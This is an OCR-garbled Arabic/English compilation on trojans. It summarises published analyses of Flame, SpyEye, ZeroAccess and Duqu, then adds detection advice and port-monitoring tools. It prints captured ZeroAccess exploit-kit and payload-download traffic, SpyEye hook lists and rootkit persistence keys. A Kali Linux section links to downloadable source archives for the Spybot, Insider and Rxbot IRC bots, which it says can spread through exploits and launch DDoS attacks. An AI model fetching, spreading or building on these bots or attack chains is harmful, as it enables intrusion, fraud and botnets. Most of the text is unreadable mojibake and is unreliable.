JjiAxSI ^ jll djliLJI J ja. (metadata) ^> jJl CjULiJI ■ j^^^ cJ^^^ <^ ^uI^aII djlilxJI o^j^ ^ j l!^* 3 ^ 

PGP C&C .J^» c> ^ j 3 ^ 5^ f C&C Script .MySQL 

^■ULi ^Uijj .(with static IV) CBC f-^j^ Blowfish ^hOjLp* ^I^IojU l^UI cjUUj jA^ tVjl .CjULJI 
jax!\ jjq trtill jjl ja. ^l^klajU c ^ ^-ULd ^ Blowfish ^ tdjliLJI jjii^j axj .c aLa ^1 jJoc cJ^^ Blowfish 

.openssl_public_encrypt PHP function c> (Asymmetric encryption) J^** 
V* Asymmetric encryptionj blowfish ^ O^W ^ Jj^" 4l4laj|j [A&jzAa 
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Ctients and Protocols relations found In this Flame CSC http?S/wvm r #ospersky*om 



Trojan Analysis: Spy Eye 

http://techblog.avira.com : j^-a^ll 
http://techblog.avira.com/2011/03/30/analysis-of-trspy-spyeve/en 
J^b ^j^j-JI registry key i> l£ f ^ rootkits CjUii ^l^ki^l J*^j jUjj^I 

^L3| ^iii ^| jHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Current 

^tkj ^JL dii^ ^-al jaVl cil j^J (roof directory) ls jl^l ^ s^lc ^VJI 11a ^ .config.bin ^I^VI ^^Lj jUjj^I 

:AJUJ) ^jjj £l <3i*jj CjULaJI jljSSf) ^fe Ij^lS SpyEye 

(Capture network traffic) Jalisll 

.startup registry entry J) Jj^j^ 
.binary code J) Jj^jll 



iwinlogon.exe virtual address space ctejj^t UjUk^a) ^ API functions 

liS C: \WI N D 0 WS \Sy stem32\alg. exe[4GS] Wl N I N E T . dll! I nternetR eadFileE xA 771 F7E3A 8 Bytes JMP 0BAEB2EG 

.text C:\WINDOWS\System32\alg.exe[46S] WININET.dlllHttpSendRequestW 7721 1 808 8 Bytes JMP 0BAEE28G 

.text C:\WINDOWS\system32\winlogon.exe[640] ntdll.dlllNtEnumerateValueKey 7C80D87G 8 Bytes JMP 0BAD769B 

.text C:\WINDOWS\system32\winlogon.exeIG40] ntdll. dll! NtQuery Directory File 7C30DF5E 8 Bytes JMP 0BAE2DC2 

.text C:\WINDOWS\system32\winlogon.exe[640] ntdll.dlllNtResumeThread 7C80E45F 8 Bytes JMP 0BAF1 507 

.text C:\WINDOWS\system32\winlogon.exe[640] ntdll.dlllNtSetlnformationFile 7C30E5D3 8 Bytes JMP 0BAD73E5 

.text C:\WINDOWS\system32\winlogon.exe[640] ntdll. dll! NtVdmControl 7C80E875 8 Bytes JMP 0BAE2E78 

.text C:\WINDOWS\system32\winlogon.exe[640] kernel32.dll!FlushlnstructionCache 7C838277 8 Bytes JMP 0BAD7831 

.text C:\WINDOWS\system32\winlogon.exe[640] ADVAPI32.dll!CryptEncrypt 77DF1 553 3 Bytes JMP 0BAEA0E1 

.text C:\WINDOWS\system32\winlogon.exe[640] CRYPT 32. dll! PFXI mportCertS tore 77AEF743 3 Bytes JMP 0BADE30A 

.text C:\WINDOWS\system32\winlogon.exeIG40] USER32.dll!TranslateMessage 77D43BCE 3 Bytes JMP 0BAD330C 

.text C:\WINDOWS\system32\winlogon.exe[640] WS2_32.dll! send 71AB428A 3 Bytes JMP 0BAEA3B5 

.text C:\WINDOWS\system32\winlogon.exe[640] WININET.dllllnternetQueryOptionA 771 B31 A7 3 Bytes JMP 0BAE7B3D 

.text C:\WINDOWS\system32\winlogon.exe[640] WININET.dlllHttpOpenRequestA 771 C4AC5 3 Bytes JMP 0BAE7A33 

.text C:\WINDOWS\system32\winlogon.exe[640] WININET.dlllHttpAddRequestHe... 771 C54QA 3 Bytes JMP 0BADA639 

.text C:\WI NDOWS\system32\winlogon.exe[640] WININET.dllllnternetCloseHandle 771 CG1DC 3 Bytes JMP 0BAE341 5 

.text C:\WINDOWS\system32\winlogon.exe[640] WININET.dlllHttpSendRequestA 771 C7GB3 5 Bytes [EB„ 01 , C3, E3„ 7... 

.text C:\WINDOWS\system32\winlogon.exe[640] WININET.dlllHttpSendRequestA ... 771 C7GBE 2 Bytes [32, 34] {XCHG E... 

.text C:\WINDOWS\system32\winlogon.exe[640] WININET.dlllHttpQuerylnfoA 771 C3CGA 3 Bytes JMP 0BAE7EC0 

.text C:\WINDOWS\system32\winlogon.exe[640] WININET.dllllnternetReadFile 771 C3555 3 Bytes JMP 0BAEB1CC 

.text C:\WINDOWS\system32\winlogon.exe[640] WININET.dllllnternetQueryDataA... 771 D325F 3 Bytes JMP OBAEBODC 

.text C:\WINDOWS\system32\winlogon.exe[640] WININET.dllllnternetWriteFile 771 F7353 3 Bytes JMP 0BAEE3F4 

.text C:\WINDOWS\system32\winlogon.exe[640] WINI NET. dll! InternetR eadFileE xA 771 F7E3A 3 Bytes JMP 0BAEB2E6 

.text C:\WINDOWS\system32\winlogon.exe[640] WINI NET. dll! HttpSendRequestW 7721 1 303 3 Bytes JMP 0BAEE23G 

.text C:\WI NDOWS\system32\lsass.exe[G3G] ntdll.dlllNtEnumerateValueKey 7C30D37G 3 Bytes JMP 0BAD7G3B 
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MD5 of the executed sample - 



.Internet Explorer 



13 svchost.exe 








i up 








1096 


UDP 


00e5f6a15 


1034 








Q svchost.exe 


1272 


UDP 


00e5f6a15 


1900 








Q svchost.exe 


1052 


UDP 


00e5f6a15 


1032 








^ System 


4 


TCP 


00e5f6a15 


netbios-ssn 


00e5f6a15 


0 


LISTENING 


^ System 


4 


TCP 


00e5f6a15 


microsoft-ds 


00e5f6a15 


0 


LISTENING 


^ System 


4 


UDP 


00e5f6a15 


netbios-ns 








^ System 


4 


UDP 


00e5f6a15 


netbios-dgm 








^ System 


4 


UDP 


00e5fSa15 


microsoft-ds 








^ winlogon.exe 


660 


TCP 


00e5fSa15 


1083 


re verse-mtl-76-76-98-82. gogaw. com 


https 


SYN_SENT 



elcjU ^jj cilj^j aJUII SjL^I i akiL> ^ .polymorphic decryptorj UPX V". 1T * ^(malware) ^in^JI cjU^jJI 

.sub_42F851 ^ UPX ^ di^ j*j ^ jj J] 



354171h 


push 


eax 






push 


i#i*6547iiBh 






push 


i*969h 






push 


3367h 






push 


5 0il7h 






lea 


ecx, [ebp- 


1Ch] 




push 


ecx 






push 


dword ptr 


[ebp- 


OCh] 


push 


dword ptr 


[ebp- 


10h] 


call 


sub_42F851 






leaue 








retn 









Trojan Analysis: Zero Access 

http : //www . Symantec . com 

^jj^ ^^Luj dii^ Jj^jll ^ Aii^k CjI^j^j "Max++ rootkit" J "Smiscer" lJ*jj*-*1\j ^ZeroAccess 

iJzlhj ZeroAccess . (pay-per-click fraud) J^ Jli^VI ^ji* cp JjVl ^ (revenue)^^ 
CjU^jsj web exploit kits ^ ^ ^ ^ Jalj^l J!^k J^j <j| -C5 i^j ^>*i^ C5 In] L p a *kiJI ^ji^JI rootkit 
CiSi^j] jc^V l^l^kiajl backdoor ^Uij lSj^ ZeroAccess i> ^ ^ .<p^^l\ ^^Jl 

.searching engine poisoningj 'performing click fraud '<^j3l a^Vi ^IjJI ^ 

(JL^VI LkL* jjS jiUI) Click fraud scheme 
o- 3 ^ backdoor c> hkj^ i<JL±\ payload d-^j ^£j" ^jSj ZeroAccess ^L-aVI ^j^? 

j <> JSI ^^l-j Click fraud scheme ^ a* .click fraud fjfc ^ ^ ii* <U b aj 

.a£j^13 <xj^lpay-per-click 

^ jjill jiljJI c_jU^I Sk. lU*j ^jii (flrf network) CP^^ cMaA ^ (sign up) J^^W ^ (Arfv^rrf5*^rs*)u^i*^^ 
(Advertisers) ^ ajj5Ic-VI CjI^jjoJI /d jjt > ^ a1 JjILj Cijjijyi a£jjoi ^^ic j>» ^jc CjU^IcVI ^IasujujI ^^ic 

j5 ([pay-per-view]u^j^ gi^M) j^t Jit U jjJj Sj* ^ ^ J: ii^ ^iljJ! c_jU^I ^U^j o^j^j <yjj^ 

.cjU^VI ([pay-per-click]Sj^ J^J ftklt) ^>>l> 
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BlackHatMoneyMakercom 



Learn to Earn, 





\ 05 13 20 ID MMIPH 




kelean 1 







Dear Snl 

We are proud to announce a new modem solution for Ppc traffic, cated OckJce PPC cl*cbce,com 

Ocfcfce Team *k tides p#ofew*ona*5 of various &ekte. who are working every day to make rhts ppc ewen better for you. 

Apart from generous t*ds. ClickJce PPC offers you the fofcwiig: 

1. Webmasters Advanced feed version. 

2. Our adtaft&uatavE interact fr«:Njde& a number of utitmes for traffic processing 

3. To sanphfy your wotfc with statistics, it is possible lo choose -based lime shift Tor il 

4. An entire coffee bon of feeds s provided {Php feeds, Pubtc Feeds, image feeds, JavaScript and XML feeds] . 

5* Databases of specialized keywords are provide d; it « also possible to obtart n*che- specific customised keyword bases free of charge based 
on webmaster*! catena, 

6. Our eupport can be reached via ICQ. Lrv* Chat, e-mail or octet lyetem- 



Just grve tt a try and men make a-n m formed decision. : i 
ctcfcice com 
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Uik^ .^^klaiJI di^j (Jjjujj ZeroAccess '(pay-per-click)'* l£ J^L> £^ CjI^ J^U. Cjbt jjVI ^iLiaVL 
'ask.com 'yahoo.com 'icq.com 'bing.com 'google.com ^ ^ W) <^JI cjISj^ lJ-^JI ^^ki^JI 

:g _L Ul ^Li* AjaUial GET lUj^ ZeroAccess ' (aol.com j 

http://suzukimxmrjcn/r/redirect.php?id=9de5404ac67a404a0ela775f212cd21^ 
5&os=501.804.x86 

di^JI ^cjHj ^ jlaJ tab j' o^j^JI siaUll jli .ojLijj ^1 jA\ tab j' (pop-up window) 4^-^] oiaU J] 

4JI jiiL ^ji^j returned HTML -y?^ 3 ] J ^ yr^ jJl c^i^VI ci^JI puu ^ 



An example of returned HTML can be 


seen 


below 


ts 




2: 


func-iiir. F^-rroa.t¥l.j£fd.i 2: set ( i~ t± :E" , 

-.^ i-tj-o-^™ -•- title +- ^</titla> 

< / hcad> < £ ramc sct> < f^aniz arc=\ 

< / E rameaet"^ / html >" ; 


3: 


JkCiclP-ag-e ("■www. g^iogl e . ook. hi>._- 
j»o a rch? q=e^i r £h L= z h— s : i a 1 - = 
JfH&£^fcj*r=l", 2,null^ - HTTP/ 1 . 1 
SOO Vi-^i-idcsiuijoctJ-oris cloBe\r\ 
nCfiche-Controlt nc-cache\r\ 

Length: ^ -1- body . I&rusnth +- 
T4 \r\n\t\ri" + kodyl ? 


4: 


} 


5: 


rortn*rJ**di r*e fc ( w leo 1 « n* ko 2 tt crh *y* 
T5^cn, corny 7 s««xch=c4r6 a«bid = i & 8 6 lwy=4 



cjjjjj l^ji ^ ^"m^ t ^ J ^Ukjl j ^ij U s^lcj .web exploit kits c> ZeroAccess 

^iL.uj j^ii j ZeroAccess exploit kits * ^ .Adobe Flash player '^ c 3j. 1 ^^ 

.ulp^' J>^' c> ^ M ZeroAccess s J^V^ c> IPS c> mjj^ Jj^ 



https://www.facebook.com/tibea2004 ^uJa ^^aa^a , 
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host,: loH&iusc&ra 



4 HTTP/1 . 1 

-org K| 



Uaer-JCcent 3 Hozi 1 W 5.0 f 

Aitept 1 T.. tit F. ■ J knil , flppi iCAC LC 

Ac cept- Lancmaije ; en-us, en; cpOTT 

As cep: - Encodi ugr i g & i p , def lat e 

Ac cep t-Cbflirss t : I SO- 6 85 S- L , uti - 9 ; 0 



Main Attack URL 



en- US: rv: 1 .3.1*13) Gecko/200803 11 Fi re*o*/2 . 0 . 0 ♦ 13 



7, *;q-0.7 



id- rQ3 ' ; </d lv > < d i v fc ET /'os npfr 1 ^ en,-*? 7 d 5 5 b 5ja a ghf 46 a - g di 05 e A fl 5 ■ 6^4 5 c 1 6 616 d fl2 6^5 * 2f) 5 fr 5 5 1 5 b 5 6 5l ktt p/1 , jj 



Second Stage Exploits 



"i m^qe / i peq. 



^ . s. ' ' ' ^ un^enT -type: appH-cat 

O^^^Ho+.pic-i.flht^^ MozTlla/4.0 0 

O,o) ;*=par3elnt (c t 16); unos: : T own u St 1 " . Drg 
(aHT.fid] ;feaL= 1 £.£31 fcT7aT Accept : text/itm 1 , imace/qi 
*• ; iei=7;^ 3 =r^tn^ Ta , l e t- anri ^ CTion: keep-alive 
(it»P^™) ;tom-*QIP5fa579a hn - rp y 1 1± 200 OK 

t«=n»l] .- function shb(u) {rej. aTe: TU£, 2 5 OCT. Z01A. 15 :49:ZO GMT 

v, p,«, l,r F taB com llE^ server; Apache/2- 2.17 Ojnix} PWP/5, 2.17 
function jft7(v,ift,hl(vsi: x-Po*ered-ey: PHP/5.Z.17 
(v^)i^ti^ -^i^ an- g nt -Length: 4 '^ . _ 

„ _l- Dn - e lGET /O5no9l1-rri ■ 1 j e":i j&i'I'SZ _44 d 3 



w, ic, r 4 ^v.j, i, eU r B, ble< 
( v , 6 > j d- r tnYOyl slSIq 6a c 3 Idw 



q = . t . 



^^4 r - 



7Caj2ytfpg 570704 E eQ2 54 5-3 0107 5 - J 0-^3 ; 1; J 



Zero Access Download 



[. w ] j * + + ) i i i i q - 1 1 1 ;taci«] . K-cac HOSl ; Tcwnust ard, org 

i, j^ij K^r # a;i- 4 jeep- Accept : Tejfr/^ml + Tmage/g1f > 1naqe/jpeq, *; 

[k];j++]Uryfj=neu Act i Dnne pmnecT ion : keep-alive 

h HTTP/1,1 300 OK 

,- pete: Tue, 25 Oct 2011 15:4 9:21 gmt 
a 5ervr: Apache/2.2.17 Cun 1j^> p«p/5- 2.17 

■ ■ ;>-PuwerfcLi-Ev : 
: ■ Content ^Length: 24J712 

■ Y Trtiit *nr -r.i ^ pn^ltl on : inllner 1 lenanie*#nigdPSwh 
' ■ ^ontenx -Type : app" 1 ^ at i orn/occec -stream 

x-pad: auaid browser bug 

- r PK. s<™cache; miss from donaTn,CQtti 



ZeroAccess Download 



Host : exeikzla.m 

^12! user -Agent : opera/6 ('wi ndovs ^iT 5.1; u; Lan^lD-^ C9; xS6"l 



'% System %win32k.sys j % System %\Drivers\classpnp.sys ^^h' UjIj^ driver ZeroAccess ^iiaiill 

.aj <j^aUJI j| jSVl ~t iki^b driver ^ 

L_aLJl ^jojI a I I^LujI J ^JQ^ o 6^)LaU4 NTFS (1^3^ t ailalll driver (.1^3^ 

. %System%\config\<RANDOM CHARACTERS> 
Volume .aIa^-aII payload jj aJL^\ cjU jUI til3i£ j C5 L-aVl < driver volume ^ ^I^IujI 

\\??\ACPI#PNP0303#2&dala3ff&0 

i^Vl^ 4ij ^jj L5 iL-aV( cAilailldriver ^ ^JUJI cJ^f*^ 
\\??\ACPI#PNP0303#2&dala3ff&0\L\ fEIGHT RANDOM CHARACTERS] 

iiu 128 f RC4 -» VOLUME I V ejUUl f Lkj jjiii ^ 

\xFF\x7C\xFl\x64\X12\xE2\x2D\x4D\xBl\xCF\x0F\x5D\x6F\xE5\xA0\x49 

13 ^^joLjjjll J-<^JI <Jaii£ t jj > ^il (_^ilt driver (jU^ia] aJUII (registry) Jj> > n^l dVl^^l jj^^ <^lli axj 

:ZeroAccess 



e 


HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Services\ [FILE 
INFECTED DRIVER] V'ImagePath" = 


NAME 


OF 


e 


HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\5ervices\ [FILE 
INFECTED DRIVER] \" Type" = "1" 


NAME 


OF 


e 


HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Services\ [FILE 
INFECTED DRIVER] V'Start" - "3" 


NAME 


OF 



jj j^jII ^ aj y^l\ CjUUJI jA^oj ^ (injected code) uj^Jl ^jSII . APC t> services.exe ^jSII <^ ^ 
aL^3! CjUUJI caL pLSsI L^lj \??\ACPI#PNP0303#2&dala3ff&0\U o-^ <^ NTFS 
cjUL J o^loader Jl <^ ^ ^ %SystemDrive%\2385299062: 2302268273.exe 

Uiiiis j I^L^j ^ NTFS yr*^ volume J ^ <^^V^ payload 



https://www.facebook.com/tibea2004 A^Ia ls 3li^ , 



Trojan Analysis: Duqu 



http ://w w w . securelist . com : j^-a^ll 
http://www.securelist.com/en/blog/208 193 178/Duqu FAQ 
.4 a a uJ 1 aIloj Stuxnet worm I o^Uu^VI 6* ^ ^1 j ^1 jjL jl^a^ j& Duqu 

,4 > *al aJl CjUi jIslaII Aijjoa J t ^ > ojI ^Uaill ^ Backdoor cl**^ j& ls^wj^ o^j*^\ j 
"slices" c> .^tjSVl c> ^ c> ^ y^j binary of- * J-^- ^ic- j* Payload DLL ls^j^ <*^J1 

^ -J^> DLL U-^J J t^irt (object file) ^ ^ yr^ ^L£VI 

' run-time library functions 'Standard Template Library (STL) functions 'C++ g^j* ^ ^ 

.C&C c> aJ^I^I! ^IjSVl ^ csj 1 ^ yr^J slices c> jjSVi ^jj^JI 'user- written codej 



Code section, Duqu payload DLL 




C++- Standard Template Library functions 




Native C++ code with STL 


■1D0DCZC9 


Payload 

Other Language / C framework 
No C++ 


.10023*78 


Native C+ + code with STL 


.lDaZSF2C 


Run-Time library code 


.10D2EAD1 


Native C code for injection 




API thunks r Exception handlers 



Layout of the code section of the Payload DLL file 



Duqu Framework *t 

*\ jjuj (Function) jl! ^ ^\ ch\ ^^Ic ^ y^l V .C++ 4-1*^1 jj I^ja^j ^jj <jV ijjj^VI 5iiLk-a slice 6 ^ 
.Duqu Framework ci^j .object-oriented ±&!L yr* o^j ' user-written C++jt ^u^*^ 

.Duqu Framework ^ AjJjSII q^iL^I 
;d jjIaJI L >ajL^aaJ I ^ .ipsJI Duqu Frame work ^ ^ du^kiujl ^1 ^1 

object ^yr" 1 ^ ^ " 
b pUj1I axj <Laxj class instance y^ Sj^U* (Function table) <-tiUajll Jj^ ^ 

.user written codej ( hashes 'linked lists) utility class ja* 2 ^ - 
event-driven j deferred execution queues 'method call f^^j (Object communication) iS^\J& cS^ 

.callbacks 

^b^j J^H\ API Windows ^m^A ^ -run-time library functions ^ J^) ^j 2 ^ 



https://www.facebook.com/tibea2004 



Event-Driven Framework *i 

t£lU& ^L^-jjiill 4jiL ^^jjaij JjS ^ a^uz^ia el ijou] ^j£U3U Duqu Framework <^ cjUjI^I! iiijjj ~j ^ > 

.event driven j*> j ^ ^ t^'j 3^ ls^- e^ 1 ^ cs^ {Framework) J-K^ ^Lua^ 6 jjI* 0 cj! 

:event driven (* j* 5 cs^Ls {special object) cjUIS ^Ua 

.API Windows aL^Ijj <^Jl^ <, Event objects 

.<V>3I cjbiiiiill j^ljJaj djI^Vl ^jIjS ^xj g-jllj Thread context objects 

(evew/)^^Vb l^iajj ^ ^j3I Callback objects - 
.Callback objects {event)^±^\ thread context l£ <> L$jL^ ^ ^1 < Event monitors 
.per-thread J] Jj^jli j^jjj <Loii3! thread jrt Thread context storage 
jia l^jls j j^ii V <j| U£ t<il3 s jj^Ux» cj! jl^j ^1 I^jJ (jjjJ ^! j 'Object C ^^Aj ^ event driven ^ >^ 

.C compilers (Compiled) 



Event object 



Callback object 



Object 1 



Event mnriitc 



Thread context: 
Event and call qusu 



I Thread context storage 



Callback object connects to a native OS event 
Event object registers itself in the thread context 



Event abject 



Callback object 



Object 1 



Event monitor 



Thread c 


current: 


Event 3 nd! i 


z-all queue 



I Thread content storage | 



The event is signalled 
by the OS or another object 



Object 2. 



Event abject 


^ 


Event monitor 




+ 


Callback object 





"unread content: 
Event and call queue 


Object 1 





Thread context storage 

Event mon itor executes callback objects in the 
thread that owns them 

Event-driven model of the Duqu Framework 

http://ihackers.co/downloads/tools/ 
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Trojan Types in Kali Linux 

Binary Trojan Horses *k 

La LJlc. j jUia cJ-^ ^ ^ u^j^ j^j j cJ-'^ ^ s^lc j (.exe) binary cJ^ 1 ^ 6 ^ jj^^ ^ u^^l 

J^aj 'eject CD-ROM 'swap mount buttons ^ j^ll lU^j 

^jl > ^>^> t£lU& <jl£ ^1 ^\ jIuj .backdoor ^s-^* ls ^ ^J-*-^ aIa^LujVI jjc. £>i& s^I j^ia 3 L^a^.1 jiisu 

a£LgI .Optix Pro 13* > ^1 j ^ j ^ j^A 3 y cs-^j S^^J £>i& sj) j^A 3 q\ > ^j^iaslII JJ^jII 

;Ua l^Jc jjiis^l clA^ binary jjia 4 i> .rsi ^ 

http://www.offensivesecurity.com/pwbonh^ 

Open Source Trojan Horses 

<j^LkJI ^ j^3l <jV j binary ^ ^ n ^>^1 ^ ji&l jAj^xJI jiL* s^l j^la ^ u <^^\ <J > 

j.L^axJl jSi* e^ljjla <l^al ^ ^1 CjVUJI ^JAxJl cilUfc .V ^1 backdoor "UaljTluil 

Igil ^ jliixJl j^axJl D^ljjia ^ 4_jaLjal o^jli . j^axJl jliLd S^ljjia Ajj^a^.! £a ^-LiaslSI 4i53l J - ^aij V ^Uil 'backdOOr 

Spybot -1 

^.l^xJl (jjjia (jC La] CjaLjalujI) IRC ^ -WL^ C?'^ IRC C-!^- J . IRCc^* '^""0 ^jl Jjia (jl > J& Spybot 

j-^ljVl \:° v; cp> IRC ^i^j^ ^UIujV! j^laj Jj*j^iI] L-iILlj jL^jj^l 11a .(c-J^ c>» j5 

.A-ia - Sail jl^-^ 

jj^ o^j lccwin32j Spybot .Spybot (compile) lccwin32 c^j 

http://www.offensive-security.com/pwbonline/spybot.tar.gz 

Insider -2 

Insider ,<j j^Ji j ^-j^j^ ajIa^JI <jl JjW^ U jLij] ^\ HTTP jj^ 3 j& Insider 

fJL jU. jjjII ^Uiiilil ^1 jVl c> C5 Ic^ j Ujjaui lJ^JI ^jjjII ^^U. ^jGET HTTP s-^a ^LijL ^Lill J jL^j 

( . illaj ^^joi^j^JI lili 4£jjuj c _ 5 ic JL^j!>U ^^juo^j^JI a i^Lujj jiii 6 registry ^ c _ 5 jua^j^>i3l ^ILi ^jjjUc ^jc cll^JL 

http://www.offensive-security.com/pwbonline/insider.tar.gz 

World Domination Trojan Horses *k 
jj s j^l <jL^iIj jL^VI jll U%Ia j jV hybrid worm * World domination Trojan horses 

(IP (jUaj <C ^ j\) dljjljVI (J^^^J ^ S^lc oi^ 6^1 J^ali ^ u .^i^l ,A£jJjoui exploits ^I'^^nlj 6^lc j 64_jaLjal 

.4x. jjoiJ Jj^ilii dljl d^I Jjiall Vn^i^V clA^ exploit J ^ > ^ ^3 Lft^JC- .c5 J^-l j^i^qll I^JJj 4 (JaslSI I^jj tA-lauJali 

^jiasu ^ ^ - taJJ d^Ic oi^ o^ljjiall A L ^>^^ i <cLoj 24 1 ^ 4000 J^-^ UjISIj ^IS L_ oi^ o^ljjia A L ^.1 jLujjjl Cllil j 

.ojjja^ it jj^j t^ccj^ll ^jjJI j^j 6 DDOS ^-a^a l^l^aajuit ^1 j botnet J j^ ^ 

Rxbot -1 

1^ 6 j^Ji anti-debugging ^ j^VI o^su jjL jL^a^ . jL^VI <— 1\ j^a ^ IRC . Vnu^ s^l jjL (jL^a^ Rxbot 

http://www.offensive-security.com/pwbonline/rxbot.tar.gz 
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OUjjttt & TROJAN DETECTION (6.5) 



j>» (JA iOjl jxaj ^Uajll 4_jLa^. J (il^cLoaJ JUILj L-jL^a^SI ^Uail! Jc o^l jjla ^jl - J J^-J t ^C-LoiJ 6^1 jjla L_Lu£ 



?(How To Detect Trojans) c^-aa. Cf- 

CjULaII 4jU^.j 4<j ^- ^ * cJ j^ll ^ ( ; .^j^^ CjU» jIslxJIj <iL <j^aL^JI CjliLJI J] <J jll JUlLj ttiL 

ciL (j^aLkll ^UajJl Jc Jjfi\ ^ J <— Luo^llj LjUIj ^juoxJ (_£ill tdjLuj JJJaJl 3 ^KaI ^l>laJ ml lAusv** mil CjLg jIx-aII j 

|6^l Jjia (j\ > (jC c LjjSII djl jjaaJl Jj LajS j .Uj^J ciL ^aLkll ^Uajll Jc ^jIa JJjll (jc t Lu&ll Liajl aJ j| 

jJjulaII jjLaII ial_L<Jl (jC- diaJl 
jj.ui.a1 I <J-axj ^11 CjUIaxJI Cll^Jl 

.aa jj.ui.a11 registry ^Vl^^J (jc ill 
jj jnx^ll ^A^' ^ jjAaII (device driver) ^ J^-^j* ^1 jj 0^ 

Mj^l\ WINDOWS SERVICE c> ^ 

jJ.u1.a1 I (Jjijulill f.Aj ^LXiljJ ^j-a^a 

jJjouJI CjI^K a\\ j CliliLJl ^jc laall 
,4jfc jj.ui.a1 I A£jjoi3I Aiajodl (J^a^a 
.(JjxjujIII ^aUaj Cjl <A jJjolaII dj^jAxjll (J^a^S 

jjj^l jo ( Trojan Scanner J^-^ 



(Scanning For Suspicious Ports) ^ j^AaII jsiILaI) ^ diaall 

A u .^i^l ^.^J -U^ 1 JJ^^ CjLaJlxjQ (_^J^.I ojxi ^JU^J^U A-i^jJall jl^. Jc 4^ Vim a joill ialixJl jflj 6^1 J^la 4 u ■n^l 

jl Aijjst>» JJC. XP U^J^" C5^1 ^- > - > ^ > - >1 ^ ^ (Jlj^ajl Claallj jJ.ui.a11 iaLLoll j ^>^A _4J^ jJ.ui.a1 I iaLiAll j ^>^q ^jjjla jc. d^A D^ljjJa 



Active Ccnnrctinns 



Am 





[rfir-nL flrfrlT*-a 


T'nrr jq 






t it c. 


TCP 




frl H « 




:B 


r r :T"-Hik.-; 


TCP 




M.lf_ifl. 


H 


11 


LIITiL-.hlNC 


TCP 




H.H..rt. 


ft 


i\ 




rcr 


tf.w.'Hi - in;: i 


B.B.O. 


H 


■ H 


LIST EN J He J 


TCP 




h.h_b. 




11 


LC'iTrNlHR 


Ji.i J 


U.H*U*V:ll»V 


M.H_it. 




:ll 






a a a 


m Lb ii 


U 


u 


II 1 ■ H 1 M (Z 


TCP 




H.lt-H. 


I 


n 


[.[•:i«H]HC 


rcr 


B.B,B.ei2nfi? 




ki 


■ II 


LI STLH] HG 


TCP 


0.9.9.«:£357 


M.H-B. 


n 


n 


UEIENJhu: 


itJ 1 


H.i9.U.ig:i!K£lJ 






:I1 


Llilt.HJHLi 


TCP 


0.9.9.9:22150 


a.B-9. 




11 


LinENJNC 


TCP 


ll!V.H.«.l :liB2Lj 






M 


Lt 21 L-.N J HG 


f CP 


i^7.fl.fl. i - i?fua 


a.n.n. 


ft 


■a 


i.i^ieiiiuc 


rep 




lav. a. 


h 


]:'. :'■■ 


LBmBLlS:HEi!> 


TCP 


127. A. S. 1 : iP.fUft 


i27_n. 


ft 




FRTADLTS-Hr& 


1 IT 


13V.H-9.1 


H rt It 


ft 


:M 


hH 1 H£1 



Tvpenet&tat -an 
in oommand prompt 




System Administrator 
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Port Monitoring Tools: TCPView and Currports 

TCPView i- 

http://technet.microsoft.com : j^-a^ll 

ciUi ^ Uj ;ciL ^-aUJI ^Ua^l UDP j TCP ^VL^il ^i^J aa^a ^IjS c*U ^311 j Jj^j jj ^ TCPView 

J^u TCPView ^ o^jj Jj^j 'Windows Server 2008 J* .TCP ^Vl^i! <!U j j ^jM 
^ netstat ^^-^ o -0 L^.U^aj £jL* jL^xJI ajc <c a jSjj TCPView \& ^Jaiij-all ^1 jjjISj 

<j-aUJl (j^j^l fjJ Cj! jl^al IP (JJjUc; t^Jaj^ljJDP J TCP ^lAxlj ^ jiiui TCPVieW J^j^ ^ 

.ajjIj l£ TCPView 'W 3 ' ^VL^jVI AilS ^ j^TCPView < XPJj^j ^ 

(state ESTABLISHED j fafoferf ^) ^» TCP/IP Jite] ^ f^l^JI .>^>Vl uj 1 ^ uj£ ^Vl^iV! j 

close j^lj connection ^ cwVl jjj Jtill ^jia c> J 'Close Connections | File j^J c> 
.^Ajlill jj^ajc Jai^. ^l^kjjujU L_aL» TCPView ^j^-j ^ '^'^ .a^jUII jjUjuJ! 4_*jta ^ connection 



File Options 
B A 



P roc c ss 



TCPView - Sysiotemals: www.sysirhternals.com 

Yitw Hdp 



Process ' 


PI L r 


-'roioccil 


Locei Addiess 


Locd Porl 


Rero(e Address 


Rennote Por( 


■- ta i e 




• • IS^stem Proc,.. 


a 


TCP 


lAnn-rris selcM k41 


4277 


12317S32 147 


Ntp 


TIME WAIT 




IF chrome eae 
chrome eat 


772 

772 


TCP 
TCP 


win-nrisselck^k^l 
yjin-nris selek4k4T 


4164 
4250 


123.176.32 147 
123 1 76 32 1 38 


Ntp 
http 


ESTABLISHED 
ESTABLISHED 




chrome, ewe 


772 


TCP 




4251 


123 17632 13© 


hup 


ESTABLISHED 




6" chrome ewe 


772 


TCP 


win-nrisse:lck4k4T 


4252 


123 176 *2 153 


Ntp 


ESTABLISHED 




& chrome ene 


772 


TCP 


wiri-nn*telck4k41 


4274 


r 199-53-1 50^3. Iwt 


hrtp 


CLOSE WAIT 




chrome, eae 


772 


TCP 


win-nrissslck4k41 


4275 


vts13Llb40.lond.co... 


http 


ESTABLISHED 




<S~ Chf OfTlC CHt 


772 


TCP 


win-mssclck4k.41 


427G 


vpl 3.lb40. loncLco, . . 


hftp 


ESTABLISHED 




(J" chroma, ex* 


772 


TCP 


win-mEselck4 k41 




123 17S.32.1 47 


http 


ESTABLISHED 




4$" chrome ewe 


//.-■ 


TCP 


wiri-mis&elck4 k4 1 


4279 


™a03alG-in-r27.1 .. 


http 


ESTABLISHED 




fi* chrome exe 


772 


TCP 


n ■ rn e e e \c k4 k 41 


4260 


™fl03s1G-in^r27.1 .. 


http 


ESTABLISHED 




<S5&. ^dpr_*arvef, eHe 3380 


TCP 




12121 


Wl M-M S 5E LCK4K. . . 


0 


LISTENING 




A edpr_sefvef.exe 33B0 


TCP 
TCP 


W1N-M5SELCIC4K 


121 Z2 
1i r " 


W1N-M55ELCK4K 


D 

1052 


LISTENING 
ESTABLISHED 




w fSrefoK.ene 


3S76 


TCP 


WIN -M SS ELCK4K_. 


1052 


looalhcsi 


I 05 1 


E5TABUSHED 




■v freFox.GKe 


3876 


TCP 


win-ms5clck4k41 


10B2 


hirin-riB3.1c1 00.... 


https 


ESTABLISHED 




■ft fiefoM.aiw 


3876 


TCP 


n - riiE so Ick4 k 4 1 


4033 


maa03^16 in f22_1__„ 


HWps 


ESTABUSHED 




fltfOM CMC 


387G 


TCP 


Yyirvrnsselck4k41 


